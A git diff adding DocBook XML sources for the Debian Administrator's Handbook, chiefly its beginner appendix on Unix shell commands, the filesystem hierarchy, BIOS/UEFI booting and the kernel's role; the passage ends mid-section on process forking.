+		 <indexterm>
+			<primary>Distrowatch</primary>
+		</indexterm>
+		 <para>
+			The Distrowatch website references a huge number of Linux distributions, many of which are based on Debian. Browsing this site is a great way to get a sense of the diversity in the Free Software world. <ulink type="block" url="http://distrowatch.com" />
+		</para>
+		 <para>
+			The search form can help track down a distribution based on its ancestry. In March 2015, selecting Debian led to 131 active distributions! <ulink type="block" url="http://distrowatch.com/search.php" />
+		</para>
+
+	</section>
+</appendix>
+
diff --git a/tmp/cs-CZ/xml/92_short-remedial-course.xml b/tmp/cs-CZ/xml/92_short-remedial-course.xml
new file mode 100644
index 000000000..0b5359423
--- /dev/null
+++ b/tmp/cs-CZ/xml/92_short-remedial-course.xml
@@ -0,0 +1,642 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="short-remedial-course" lang="cs-CZ">
+	<appendixinfo>
+		 <keywordset>
+			<keyword>BIOS</keyword>
+			 <keyword>Kernel</keyword>
+			 <keyword>Unix</keyword>
+			 <keyword>Process</keyword>
+			 <keyword>Hierarchy</keyword>
+			 <keyword>Basic Commands</keyword>
+
+		</keywordset>
+
+	</appendixinfo>
+	 <title>Short Remedial Course</title>
+	 <highlights> <para>
+		Even though this book primarily targets administrators and “power-users”, we wouldn't like to exclude motivated beginners. This appendix will therefore be a crash-course describing the fundamental concepts involved in handling a Unix computer.
+	</para>
+	 </highlights> <section id="sect.shell-and-basic-commands">
+		<title>Shell and Basic Commands</title>
+		 <para>
+			In the Unix world, every administrator has to use the command line sooner or later; for example, when the system fails to start properly and only provides a command-line rescue mode. Being able to handle such an interface, therefore, is a basic survival skill for these circumstances.
+		</para>
+		 <sidebar> <title><emphasis>QUICK LOOK</emphasis> Starting the command interpreter</title>
+		 <para>
+			A command-line environment can be run from the graphical desktop, by an application known as a “terminal”. In GNOME, you can start it from the “Activities” overview (that you get when you move the mouse in the top-left corner of the screen) by typing the first letters of the application name. In Plasma, you will find it in the <menuchoice><guimenu>K</guimenu> <guisubmenu>Applications</guisubmenu> <guisubmenu>System</guisubmenu></menuchoice> menu.
+		</para>
+		 </sidebar> <para>
+			This section only gives a quick peek at the commands. They all have many options not described here, so please refer to the abundant documentation in their respective manual pages.
+		</para>
+		 <section>
+			<title>Browsing the Directory Tree and Managing Files</title>
+			 <para>
+				Once a session is open, the <command>pwd</command> command (which stands for <emphasis>print working directory</emphasis>) displays the current location in the filesystem. The current directory is changed with the <command>cd <replaceable>directory</replaceable></command> command (<command>cd</command> is for <emphasis>change directory</emphasis>). The parent directory is always called <literal>..</literal> (two dots), whereas the current directory is also known as <literal>.</literal> (one dot). The <command>ls</command> command allows <emphasis>listing</emphasis> the contents of a directory. If no parameters are given, it operates on the current directory.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog
+$ </computeroutput><userinput>cd Desktop</userinput>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog/Desktop
+$ </computeroutput><userinput>cd .</userinput>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog/Desktop
+$ </computeroutput><userinput>cd ..</userinput>
+<computeroutput>$ </computeroutput><userinput>pwd</userinput>
+<computeroutput>/home/rhertzog
+$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  Pictures  Templates
+Documents  Music      Public    Videos</computeroutput>
+</screen>
+			 <para>
+				A new directory can be created with <command>mkdir <replaceable>directory</replaceable></command>, and an existing (empty) directory can be removed with <command>rmdir <replaceable>directory</replaceable></command>. The <command>mv</command> command allows <emphasis>moving</emphasis> and/or renaming files and directories; <emphasis>removing</emphasis> a file is achieved with <command>rm <replaceable>file</replaceable></command>.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>mkdir test</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public    test
+$ </computeroutput><userinput>mv test new</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  new       Public     Videos
+Documents  Music      Pictures  Templates
+$ </computeroutput><userinput>rmdir new</userinput>
+<computeroutput>$ </computeroutput><userinput>ls</userinput>
+<computeroutput>Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public</computeroutput>
+</screen>
+
+		</section>
+		 <section>
+			<title>Displaying and Modifying Text Files</title>
+			 <para>
+				The <command>cat <replaceable>file</replaceable></command> command (intended to <emphasis>concatenate</emphasis> files to the standard output device) reads a file and displays its contents on the terminal. If the file is too big to fit on a screen, use a pager such as <command>less</command> (or <command>more</command>) to display it page by page.
+			</para>
+			 <para>
+				The <command>editor</command> command starts a text editor (such as <command>vi</command> or <command>nano</command>) and allows creating, modifying and reading text files. The simplest files can sometimes be created directly from the command interpreter thanks to redirection: <command>echo "<replaceable>text</replaceable>" &gt;<replaceable>file</replaceable></command> creates a file named <replaceable>file</replaceable> with “<replaceable>text</replaceable>” as its contents. Adding a line at the end of this file is possible too, with a command such as <command>echo "<replaceable>moretext</replaceable>" &gt;&gt;<replaceable>file</replaceable></command>. Note the <literal>&gt;&gt;</literal> in this example.
+			</para>
+
+		</section>
+		 <section>
+			<title>Searching for Files and within Files</title>
+			 <para>
+				The <command>find <replaceable>directory</replaceable> <replaceable>criteria</replaceable></command> command looks for files in the hierarchy under <replaceable>directory</replaceable> according to several criteria. The most commonly used criterion is <literal>-name <replaceable>name</replaceable></literal>: that allows looking for a file by its name.
+			</para>
+			 <para>
+				The <command>grep <replaceable>expression</replaceable> <replaceable>files</replaceable></command> command searches the contents of the files and extracts the lines matching the regular expression (see sidebar <xref linkend="sidebar.regexp" />). Adding the <literal>-r</literal> option enables a recursive search on all files contained in the directory passed as a parameter. This allows looking for a file when only a part of the contents are known.
+			</para>
+
+		</section>
+		 <section>
+			<title>Managing Processes</title>
+			 <para>
+				The <command>ps aux</command> command lists the processes currently running and helps identifying them by showing their <emphasis>pid</emphasis> (process id). Once the <emphasis>pid</emphasis> of a process is known, the <command>kill -<replaceable>signal</replaceable> <replaceable>pid</replaceable></command> command allows sending it a signal (if the process belongs to the current user). Several signals exist; most commonly used are <literal>TERM</literal> (a request to terminate gracefully) and <literal>KILL</literal> (a forced kill).
+			</para>
+			 <para>
+				The command interpreter can also run programs in the background if the command is followed by a “&amp;”. By using the ampersand, the user resumes control of the shell immediately even though the command is still running (hidden from the user; as a background process). The <command>jobs</command> command lists the processes running in the background; running <command>fg %<replaceable>job-number</replaceable></command> (for <emphasis>foreground</emphasis>) restores a job to the foreground. When a command is running in the foreground (either because it was started normally, or brought back to the foreground with <command>fg</command>), the <keycombo action="simul"><keycap>Control</keycap><keycap>Z</keycap></keycombo> key combination pauses the process and resumes control of the command-line. The process can then be restarted in the background with <command>bg %<replaceable>job-number</replaceable></command> (for <foreignphrase>background</foreignphrase>).
+			</para>
+
+		</section>
+		 <section>
+			<title>System Information: Memory, Disk Space, Identity</title>
+			 <para>
+				The <command>free</command> command displays information on memory; <command>df</command> (<emphasis>disk free</emphasis>) reports on the available disk space on each of the disks mounted in the filesystem. Its <literal>-h</literal> option (for <emphasis>human readable</emphasis>) converts the sizes into a more legible unit (usually mebibytes or gibibytes). In a similar fashion, the <command>free</command> command supports the <literal>-m</literal> and <literal>-g</literal> options, and displays its data either in mebibytes or in gibibytes, respectively.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>free</userinput>
+<computeroutput>             total       used       free     shared    buffers     cached
+Mem:       1028420    1009624      18796          0      47404     391804
+-/+ buffers/cache:     570416     458004
+Swap:      2771172     404588    2366584
+$ </computeroutput><userinput>df</userinput>
+<computeroutput>Filesystem           1K-blocks      Used Available Use% Mounted on
+/dev/sda2              9614084   4737916   4387796  52% /
+tmpfs                   514208         0    514208   0% /lib/init/rw
+udev                     10240       100     10140   1% /dev
+tmpfs                   514208    269136    245072  53% /dev/shm
+/dev/sda5             44552904  36315896   7784380  83% /home
+</computeroutput></screen>
+			 <para>
+				The <command>id</command> command displays the identity of the user running the session, along with the list of groups they belong to. Since access to some files or devices may be limited to group members, checking available group membership may be useful.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>id</userinput>
+<computeroutput>uid=1000(rhertzog) gid=1000(rhertzog) groups=1000(rhertzog),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)</computeroutput>
+</screen>
+
+		</section>
+
+	</section>
+	 <section id="sect.filesystem-hierarchy">
+		<title>Organization of the Filesystem Hierarchy</title>
+		 <indexterm>
+			<primary>Filesystem Hierarchy</primary>
+		</indexterm>
+		 <section>
+			<title>The Root Directory</title>
+			 <para>
+				A Debian system is organized along the <emphasis>Filesystem Hierarchy Standard</emphasis> (FHS). This standard defines the purpose of each directory. For instance, the top-level directories are described as follows:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<filename>/bin/</filename>: basic programs;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/boot/</filename>: Linux kernel and other files required for its early boot process;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/dev/</filename>: device files;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/etc/</filename>: configuration files;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/home/</filename>: user's personal files;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/lib/</filename>: basic libraries;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/media/*</filename>: mount points for removable devices (CD-ROM, USB keys and so on);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/mnt/</filename>: temporary mount point;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/opt/</filename>: extra applications provided by third parties;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/root/</filename>: administrator's (root's) personal files;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/run/</filename>: volatile runtime data that does not persist across reboots (not yet included in the FHS);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/sbin/</filename>: system programs;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/srv/</filename>: data used by servers hosted on this system;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/tmp/</filename>: temporary files; this directory is often emptied at boot;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/usr/</filename>: applications; this directory is further subdivided into <filename>bin</filename>, <filename>sbin</filename>, <filename>lib</filename> (according to the same logic as in the root directory). Furthermore, <filename>/usr/share/</filename> contains architecture-independent data. <filename>/usr/local/</filename> is meant to be used by the administrator for installing applications manually without overwriting files handled by the packaging system (<command>dpkg</command>).
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/var/</filename>: variable data handled by daemons. This includes log files, queues, spools, caches and so on.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<filename>/proc/</filename> and <filename>/sys/</filename> are specific to the Linux kernel (and not part of the FHS). They are used by the kernel for exporting data to user space (see <xref linkend="sect.userspace-presentation" /> and <xref linkend="sect.user-space" /> for explanations about this concept).
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+
+		</section>
+		 <section>
+			<title>The User's Home Directory</title>
+			 <para>
+				The contents of a user's home directory is not standardized, but there are still a few noteworthy conventions. One is that a user's home directory is often referred to by a tilde (“~”). That is useful to know because command interpreters automatically replace a tilde with the correct directory (usually <filename>/home/<replaceable>user</replaceable>/</filename>).
+			</para>
+			 <para>
+				Traditionally, application configuration files are often stored directly under the user's home directory, but their names usually start with a dot (for instance, the <command>mutt</command> email client stores its configuration in <filename>~/.muttrc</filename>). Note that filenames that start with a dot are hidden by default; and <command>ls</command> only lists them when the <literal>-a</literal> option is used, and graphical file managers need to be told to display hidden files.
+			</para>
+			 <para>
+				Some programs also use multiple configuration files organized in one directory (for instance, <filename>~/.ssh/</filename>). Some applications (such as the Iceweasel web browser) also use their directory to store a cache of downloaded data. This means that those directories can end up using a lot of disk space.
+			</para>
+			 <para>
+				These configuration files stored directly in a user's home directory, often collectively referred to as <emphasis>dotfiles</emphasis>, have long proliferated to the point that these directories can be quite cluttered with them. Fortunately, an effort led collectively under the FreeDesktop.org umbrella has resulted in the “XDG Base Directory Specification”, a convention that aims at cleaning up these files and directory. This specification states that configuration files should be stored under <filename>~/.config</filename>, cache files under <filename>~/.cache</filename>, and application data files under <filename>~/.local</filename> (or subdirectories thereof). This convention is slowly gaining traction, and several applications (especially graphical ones) have started following it.
+			</para>
+			 <para>
+				Graphical desktops usually display the contents of the <filename>~/Desktop/</filename> directory (or whatever the appropriate translation is for systems not configured in English) on the desktop (ie, what is visible on screen once all applications are closed or iconized).
+			</para>
+			 <para>
+				Finally, the email system sometimes stores incoming emails into a <filename>~/Mail/</filename> directory.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.computer-layers">
+		<title>Inner Workings of a Computer: the Different Layers Involved</title>
+		 <para>
+			A computer is often considered as something rather abstract, and the externally visible interface is much simpler than its internal complexity. Such complexity comes in part from the number of pieces involved. However, these pieces can be viewed in layers, where a layer only interacts with those immediately above or below.
+		</para>
+		 <para>
+			An end-user can get by without knowing these details… as long as everything works. When confronting a problem such as, “The internet doesn't work!”, the first thing to do is to identify in which layer the problem originates. Is the network card (hardware) working? Is it recognized by the computer? Does the Linux kernel see it? Are the network parameters properly configured? All these questions isolate an appropriate layer and focus on a potential source of the problem.
+		</para>
+		 <section id="sect.hardware">
+			<title>The Deepest Layer: the Hardware</title>
+			 <indexterm>
+				<primary>IDE</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>SCSI</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Serial ATA</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Parallel ATA</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>ATA</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>IEEE 1394</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Firewire</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>USB</primary>
+			</indexterm>
+			 <para>
+				Let us start with a basic reminder that a computer is, first and foremost, a set of hardware elements. There is generally a main board (known as the <emphasis>motherboard</emphasis>), with one (or more) processor(s), some RAM, device controllers, and extension slots for option boards (for other device controllers). Most noteworthy among these controllers are IDE (Parallel ATA), SCSI and Serial ATA, for connecting to storage devices such as hard disks. Other controllers include USB, which is able to host a great variety of devices (ranging from webcams to thermometers, from keyboards to home automation systems) and IEEE 1394 (Firewire). These controllers often allow connecting several devices so the complete subsystem handled by a controller is therefore usually known as a “bus”. Option boards include graphics cards (into which monitor screens will be plugged), sound cards, network interface cards, and so on. Some main boards are pre-built with these features, and don't need option boards.
+			</para>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Checking that the hardware works</title>
+			 <para>
+				Checking that a piece of hardware works can be tricky. On the other hand, proving that it doesn't work is sometimes quite simple.
+			</para>
+			 <para>
+				A hard disk drive is made of spinning platters and moving magnetic heads. When a hard disk is powered up, the platter motor makes a characteristic whir. It also dissipates energy as heat. Consequently, a hard disk drive that stays cold and silent when powered up is broken.
+			</para>
+			 <para>
+				Network cards often include LEDs displaying the state of the link. If a cable is plugged in and leads to a working network hub or switch, at least one LED will be on. If no LED lights up, either the card itself, the network device, or the cable between them, is faulty. The next step is therefore testing each component individually.
+			</para>
+			 <para>
+				Some option boards — especially 3D video cards — include cooling devices, such as heat sinks and/or fans. If the fan does not spin even though the card is powered up, a plausible explanation is the card overheated. This also applies to the main processor(s) located on the main board.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.bios">
+			<title>The Starter: the BIOS or UEFI</title>
+			 <indexterm>
+				<primary>BIOS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>UEFI</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Master Boot Record (MBR)</primary>
+			</indexterm>
+			 <para>
+				Hardware, on its own, is unable to perform useful tasks without a corresponding piece of software driving it. Controlling and interacting with the hardware is the purpose of the operating system and applications. These, in turn, require functional hardware to run.
+			</para>
+			 <para>
+				This symbiosis between hardware and software does not happen on its own. When the computer is first powered up, some initial setup is required. This role is assumed by the BIOS or UEFI, a piece of software embedded into the main board that runs automatically upon power-up. Its primary task is searching for software it can hand over control to. Usually, in the BIOS case, this involves looking for the first hard disk with a boot sector (also known as the <emphasis>master boot record</emphasis> or <acronym>MBR</acronym>), loading that boot sector, and running it. From then on, the BIOS is usually not involved (until the next boot). In the case of UEFI, the process involves scanning disks to find a dedicated EFI partition containing further EFI applications to execute.
+			</para>
+			 <sidebar> <title><emphasis>TOOL</emphasis> Setup, the BIOS/UEFI configuration tool</title>
+			 <indexterm>
+				<primary><emphasis>Setup</emphasis></primary>
+			</indexterm>
+			 <para>
+				The BIOS/UEFI also contains a piece of software called Setup, designed to allow configuring aspects of the computer. In particular, it allows choosing which boot device is preferred (for instance, the floppy disk or CD-ROM drive), setting the system clock, and so on. Starting Setup usually involves pressing a key very soon after the computer is powered on. This key is often <keycap>Del</keycap> or <keycap>Esc</keycap>, sometimes <keycap>F2</keycap> or <keycap>F10</keycap>. Most of the time, the choice is flashed on screen while booting.
+			</para>
+			 </sidebar> <para>
+				The boot sector (or the EFI partition), in turn, contains another piece of software, called the bootloader, whose purpose is to find and run an operating system. Since this bootloader is not embedded in the main board but loaded from disk, it can be smarter than the BIOS, which explains why the BIOS does not load the operating system by itself. For instance, the bootloader (often GRUB on Linux systems) can list the available operating systems and ask the user to choose one. Usually, a time-out and default choice is provided. Sometimes the user can also choose to add parameters to pass to the kernel, and so on. Eventually, a kernel is found, loaded into memory, and executed.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> UEFI, a modern replacement to the BIOS</title>
+			 <indexterm>
+				<primary>UEFI</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Secure Boot</primary>
+			</indexterm>
+			 <para>
+				UEFI is a relatively recent development. Most new computers will support UEFI booting, but usually they also support BIOS booting alongside for backwards compatibility with operating systems that are not ready to exploit UEFI.
+			</para>
+			 <para>
+				This new system gets rid of some of the limitations of BIOS booting: with the usage of a dedicated partition, the bootloaders no longer need special tricks to fit in a tiny <emphasis>master boot record</emphasis> and then discover the kernel to boot. Even better, with a suitably built Linux kernel, UEFI can directly boot the kernel without any intermediary bootloader. UEFI is also the basic foundation used to deliver <emphasis>Secure Boot</emphasis>, a technology ensuring that you run only software validated by your operating system vendor.
+			</para>
+			 </sidebar> <para>
+				The BIOS/UEFI is also in charge of detecting and initializing a number of devices. Obviously, this includes the IDE/SATA devices (usually hard disk(s) and CD/DVD-ROM drives), but also PCI devices. Detected devices are often listed on screen during the boot process. If this list goes by too fast, use the <keycap>Pause</keycap> key to freeze it for long enough to read. Installed PCI devices that don't appear are a bad omen. At worst, the device is faulty. At best, it is merely incompatible with the current version of the BIOS or main board. PCI specifications evolve, and old main boards are not guaranteed to handle newer PCI devices.
+			</para>
+
+		</section>
+		 <section id="sect.kernel">
+			<title>The Kernel</title>
+			 <para>
+				Both the BIOS/UEFI and the bootloader only run for a few seconds each; now we are getting to the first piece of software that runs for a longer time, the operating system kernel. This kernel assumes the role of a conductor in an orchestra, and ensures coordination between hardware and software. This role involves several tasks including: driving hardware, managing processes, users and permissions, the filesystem, and so on. The kernel provides a common base to all other programs on the system.
+			</para>
+
+		</section>
+		 <section id="sect.userspace-presentation">
+			<title>The User Space</title>
+			 <para>
+				Although everything that happens outside of the kernel can be lumped together under “user space”, we can still separate it into software layers. However, their interactions are more complex than before, and the classifications may not be as simple. An application commonly uses libraries, which in turn involve the kernel, but the communications can also involve other programs, or even many libraries calling each other.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.kernel-role-and-tasks">
+		<title>Some Tasks Handled by the Kernel</title>
+		 <section id="sect.hardware-drivers">
+			<title>Driving the Hardware</title>
+			 <para>
+				The kernel is, first and foremost, tasked with controlling the hardware parts, detecting them, switching them on when the computer is powered on, and so on. It also makes them available to higher-level software with a simplified programming interface, so applications can take advantage of devices without having to worry about details such as which extension slot the option board is plugged into. The programming interface also provides an abstraction layer; this allows video-conferencing software, for example, to use a webcam independently of its make and model. The software can just use the <emphasis>Video for Linux</emphasis> (V4L) interface, and the kernel translates the function calls of this interface into the actual hardware commands needed by the specific webcam in use.
+			</para>
+			 <para>
+				<indexterm><primary><command>lspci</command></primary></indexterm> <indexterm><primary><command>lsusb</command></primary></indexterm> <indexterm><primary><command>lsdev</command></primary></indexterm> <indexterm><primary><command>lspcmcia</command></primary></indexterm> The kernel exports many details about detected hardware through the <filename>/proc/</filename> and <filename>/sys/</filename> virtual filesystems. Several tools summarize those details. Among them, <command>lspci</command> (in the <emphasis role="pkg">pciutils</emphasis> package) lists PCI devices, <command>lsusb</command> (in the <emphasis role="pkg">usbutils</emphasis> package) lists USB devices, and <command>lspcmcia</command> (in the <emphasis role="pkg">pcmciautils</emphasis> package) lists PCMCIA cards. These tools are very useful for identifying the exact model of a device. This identification also allows more precise searches on the web, which in turn, lead to more relevant documents.
+			</para>
+			 <example>
+				<title>Example of information provided by <command>lspci</command> and <command>lsusb</command></title>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>lspci</userinput>
+<computeroutput>[...]
+00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03)
+00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03)
+00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03)
+[...]
+01:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751 Gigabit Ethernet PCI Express (rev 01)
+02:03.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
+$ </computeroutput><userinput>lsusb</userinput>
+<computeroutput>Bus 005 Device 004: ID 413c:a005 Dell Computer Corp.
+Bus 005 Device 008: ID 413c:9001 Dell Computer Corp.
+Bus 005 Device 007: ID 045e:00dd Microsoft Corp.
+Bus 005 Device 006: ID 046d:c03d Logitech, Inc.
+[...]
+Bus 002 Device 004: ID 413c:8103 Dell Computer Corp. Wireless 350 Bluetooth
+</computeroutput></screen>
+
+			</example>
+			 <para>
+				These programs have a <literal>-v</literal> option, that lists much more detailed (but usually not necessary) information. Finally, the <command>lsdev</command> command (in the <emphasis role="pkg">procinfo</emphasis> package) lists communication resources used by devices.
+			</para>
+			 <para>
+				Applications often access devices by way of special files created within <filename>/dev/</filename> (see sidebar <xref linkend="sidebar.special-files" />). These are special files that represent disk drives (for instance, <filename>/dev/hda</filename> and <filename>/dev/sdc</filename>), partitions (<filename>/dev/hda1</filename> or <filename>/dev/sdc3</filename>), mice (<filename>/dev/input/mouse0</filename>), keyboards (<filename>/dev/input/event0</filename>), soundcards (<filename>/dev/snd/*</filename>), serial ports (<filename>/dev/ttyS*</filename>), and so on.
+			</para>
+
+		</section>
+		 <section id="sect.filesystems">
+			<title>Filesystems</title>
+			 <indexterm>
+				<primary>filesystem</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>system, filesystem</primary>
+			</indexterm>
+			 <para>
+				Filesystems are one of the most prominent aspects of the kernel. Unix systems merge all the file stores into a single hierarchy, which allows users (and applications) to access data simply by knowing its location within that hierarchy.
+			</para>
+			 <para>
+				The starting point of this hierarchical tree is called the root, <filename>/</filename>. This directory can contain named subdirectories. For instance, the <literal>home</literal> subdirectory of <filename>/</filename> is called <filename>/home/</filename>. This subdirectory can, in turn, contain other subdirectories, and so on. Each directory can also contain files, where the actual data will be stored. Thus, the <filename>/home/rmas/Desktop/hello.txt</filename> name refers to a file named <literal>hello.txt</literal> stored in the <literal>Desktop</literal> subdirectory of the <literal>rmas</literal> subdirectory of the <literal>home</literal> directory present in the root. The kernel translates between this naming system and the actual, physical storage on a disk.
+			</para>
+			 <para>
+				Unlike other systems, there is only one such hierarchy, and it can integrate data from several disks. One of these disks is used as the root, and the others are “mounted” on directories in the hierarchy (the Unix command is called <command>mount</command>); these other disks are then available under these “mount points”. This allows storing users' home directories (traditionally stored within <filename>/home/</filename>) on a second hard disk, which will contain the <literal>rhertzog</literal> and <literal>rmas</literal> directories. Once the disk is mounted on <filename>/home/</filename>, these directories become accessible at their usual locations, and paths such as <filename>/home/rmas/Desktop/hello.txt</filename> keep working.
+			</para>
+			 <indexterm>
+				<primary><command>mkfs</command></primary>
+			</indexterm>
+			 <para>
+				There are many filesystem formats, corresponding to many ways of physically storing data on disks. The most widely known are <emphasis>ext2</emphasis>, <emphasis>ext3</emphasis> and <emphasis>ext4</emphasis>, but others exist. For instance, <emphasis>vfat</emphasis> is the system that was historically used by DOS and Windows operating systems, which allows using hard disks under Debian as well as under Windows. In any case, a filesystem must be prepared on a disk before it can be mounted and this operation is known as “formatting”. Commands such as <command>mkfs.ext3</command> (where <command>mkfs</command> stands for <emphasis>MaKe FileSystem</emphasis>) handle formatting. These commands require, as a parameter, a device file representing the partition to be formatted (for instance, <filename>/dev/sda1</filename>). This operation is destructive and should only be run once, except if one deliberately wishes to wipe a filesystem and start afresh.
+			</para>
+			 <para>
+				There are also network filesystems, such as <acronym>NFS</acronym>, where data is not stored on a local disk. Instead, data is transmitted through the network to a server that stores and retrieves them on demand. The filesystem abstraction shields users from having to care: files remain accessible in their usual hierarchical way.
+			</para>
+
+		</section>
+		 <section id="sect.shared-functions">
+			<title>Shared Functions</title>
+			 <para>
+				Since a number of the same functions are used by all software, it makes sense to centralize them in the kernel. For instance, shared filesystem handling allows any application to simply open a file by name, without needing to worry where the file is stored physically. The file can be stored in several different slices on a hard disk, or split across several hard disks, or even stored on a remote file server. Shared communication functions are used by applications to exchange data independently of the way the data is transported. For instance, transport could be over any combination of local or wireless networks, or over a telephone landline.
+			</para>
+
+		</section>
+		 <section id="sect.process-management">
+			<title>Managing Processes</title>
+			 <indexterm>
+				<primary><emphasis>pid</emphasis></primary>
+			</indexterm>
+			 <para>
+				A process is a running instance of a program. This requires memory to store both the program itself and its operating data. The kernel is in charge of creating and tracking them. When a program runs, the kernel first sets aside some memory, then loads the executable code from the filesystem into it, and then starts the code running. It keeps information about this process, the most visible of which is an identification number known as <emphasis>pid</emphasis> (<emphasis>process identifier</emphasis>).
+			</para>
+			 <para>
+				Unix-like kernels (including Linux), like most other modern operating systems, are capable of “multi-tasking”. In other words, they allow running many processes “at the same time”. There is actually only one running process at any one time, but the kernel cuts time into small slices and runs each process in turn. Since these time slices are very short (in the millisecond range), they create the illusion of processes running in parallel, although they are actually only active during some time intervals and idle the rest of the time. The kernel's job is to adjust its scheduling mechanisms to keep that illusion, while maximizing the global system performance. If the time slices are too long, the application may not appear as responsive as desired. Too short, and the system loses time switching tasks too frequently. These decisions can be tweaked with process priorities. High-priority processes will run for longer and with more frequent time slices than low-priority processes.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Multi-processor systems (and variants)</title>
+			 <para>
+				The limitation described above of only one process being able to run at a time, doesn't always apply. The actual restriction is that there can only be one running process <emphasis>per processor core</emphasis> at a time. Multi-processor, multi-core or “hyper-threaded” systems allow several processes to run in parallel. The same time-slicing system is still used, though, so as to handle cases where there are more active processes than available processor cores. This is far from unusual: a basic system, even a mostly idle one, almost always has tens of running processes.
+			</para>
+			 </sidebar> <para>
+				Of course, the kernel allows running several independent instances of the same program. But each can only access its own time slices and memory. Their data thus remain independent.
+			</para>
+
+		</section>
+		 <section id="sect.permissions">
+			<title>Rights Management</title>
+			 <para>
+				Unix-like systems are also multi-user. They provide a rights management system that supports separate users and groups; it also allows control over actions based on permissions. The kernel manages data for each process, allowing it to control permissions. Most of the time, a process is identified by the user who started it. That process is only permitted to take those actions available to its owner. For instance, trying to open a file requires the kernel to check the process identity against access permissions (for more details on this particular example, see <xref linkend="sect.rights-management" />).
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.user-space">
+		<title>The User Space</title>
+		 <indexterm>
+			<primary>user space</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>kernel space</primary>
+		</indexterm>
+		 <para>
+			“User space” refers to the runtime environment of normal (as opposed to kernel) processes. This does not necessarily mean these processes are actually started by users because a standard system normally has several “daemon” (or background) processes running before the user even opens a session. Daemon processes are also considered user-space processes.
+		</para>
+		 <section id="sect.process-basics">
+			<title>Process</title>
+			 <indexterm>
+				<primary><command>init</command></primary>
+			</indexterm>
+			 <para>
+				When the kernel gets past its initialization phase, it starts the very first process, <command>init</command>. Process #1 alone is very rarely useful by itself, and Unix-like systems run with many additional processes.
+			</para>
+			 <indexterm>
+				<primary><emphasis>fork</emphasis></primary>
+			</indexterm>
+			 <para>
+				First of all, a process can clone itself (this is known as a <emphasis>fork</emphasis>). The kernel allocates a new (but identical) process memory space, and another process to use it. At this time, the only difference between these two processes is their <emphasis>pid</emphasis>. The new process is usually called a child process, and the original process whose <emphasis>pid</emphasis> doesn't change, is called the parent process.
+			</para>
+			 <para>
